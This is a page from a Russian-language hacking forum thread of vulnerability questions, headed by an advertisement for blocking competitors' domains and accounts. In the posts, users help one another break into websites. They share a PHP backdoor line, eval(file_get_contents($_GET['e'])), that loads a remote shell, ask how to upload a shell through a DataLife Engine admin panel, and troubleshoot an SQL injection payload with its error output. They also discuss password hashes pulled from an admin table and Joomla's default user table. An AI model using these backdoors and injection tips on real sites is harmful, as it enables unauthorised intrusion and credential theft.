УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 1494 из 2438

1494

Опции темы

Поиск в этой теме

Опции просмотра

#14931

29.08.2010, 17:53

daniel_1024

Участник форума

Регистрация: 15.07.2009

Сообщений: 158

Провел на форуме:
698831

Репутация: 34

Pavel1987, зачем совать system($_GET["cmd"]); ???

вставляй eval(file_get_contents($_GET['e']))

и потом обращайся www.xz.сom/forumpath/faq.php?cmd=http://адресс_до_шела

почитай ВНИМАТЕЛЬНО тут

#14932

29.08.2010, 17:54

Unknown

Guest

Сообщений: n/a

Провел на форуме:
6976

Репутация: 4

Цитата:

Сообщение от попугай

попугай said:
Нельзя...

ахтунг, можно. Через уязвимости ПО, нет, не Веб ПО, а просто ПО, ftp, ssh сплойты и т.п.

#14933

29.08.2010, 18:01

Pavel1987

Guest

Сообщений: n/a

Провел на форуме:
2420

Репутация: 0

А блин точно) Спасибо большое)) Я думал шелл надо совать в админку в модули, а не заливать куда-то, во я дурак))))

#14934

29.08.2010, 18:52

stepashka_

Познавший АНТИЧАТ

Регистрация: 09.11.2009

Сообщений: 1,077

Провел на форуме:
7879791

Репутация: 265

Отправить сообщение для stepashka_ с помощью ICQ

Подскажите как залить шелл через админку DataLife Engine..

Есть доступ на прикрепление файлов к новостям.

#14935

29.08.2010, 18:52

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Цитата:

Сообщение от Charle

Charle said:
ахтунг, можно. Через уязвимости ПО, нет, не Веб ПО, а просто ПО, ftp, ssh сплойты и т.п.

прочитай несколько постов назад, был такой умник уже.

#14936

29.08.2010, 19:13

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью ICQ

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от daniel_1024

daniel_1024 said:
Pavel1987, зачем совать system($_GET["cmd"]); ???
вставляй eval(file_get_contents($_GET['e']))
и потом обращайся www.xz.сom/forumpath/faq.php?cmd=http://адресс_до_шела
почитай ВНИМАТЕЛЬНО
тут

а зачем давать детишкам шелл с графикой? если они не могут самым нормальным шелом воспользоватся, в графике они самое умное что сделают так задефейсят сайт ...был дан код который можно вставить в модули, но вариантов куча, если брать по твоему то зачем и eval(file_get_contents($_GET['e'])) когда можно код всего шелла в модули пропихнуть?...

П.С. Зачем доисторическому человеку давать бензопилу? Ведь он не знает что с топором то делать...

#14937

29.08.2010, 21:35

NorB

Познающий

Регистрация: 20.07.2007

Сообщений: 99

Провел на форуме:
1562993

Репутация: 25

SELECT DISTINCT a.ad_id, a.house_ad,a.url,b.filePath FROM advertising a, tddmadmin_file b WHERE a.date_start = now() AND a.status = 'active' AND a.adpage = 'blablabla.php?type=2'+group+by+2+--+'AND a.fileid = b.fileID

[nativecode=1064 ** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'group+by+2+--+' AND a.fileid = b.fileID' at line 5]

Подскажите как запрос свой всунуть а то с одной ' он выплевывает это, а если 2 поставить то запрос выполняется. Что в таком случае делать нужно...

'+group+by+2+--+ это пишу я ) тут плюсы фильтруются или че?

#14938

29.08.2010, 22:52

попугай

Познавший АНТИЧАТ

Регистрация: 15.01.2008

Сообщений: 1,166

Провел на форуме:
2459557

Репутация: 606

Попробуй вместо + поставить %20

#14939

30.08.2010, 00:30

manerus

Новичок

Регистрация: 10.08.2009

Сообщений: 16

Провел на форуме:
27247

Репутация: 1

Цитата:

Сообщение от Konqi

Konqi said:
скажи пожалуйста имя таблици откуда ты вытянул пароли,и в каком виде они хранялись.

имя таблицы от куда вытащил idevaff_admin, пароли хранились sha1

#14940

30.08.2010, 00:37

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от manerus

manerus said:
имя таблицы от куда вытащил idevaff_admin, пароли хранились sha1

в джумле по дефолту имя таблицы jos_users, а алгоритм шифрования md5 или md5($pass.$salt) (зависит от версии джумлы)

выводы делай сам.

Страница 1494 из 2438

1494

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход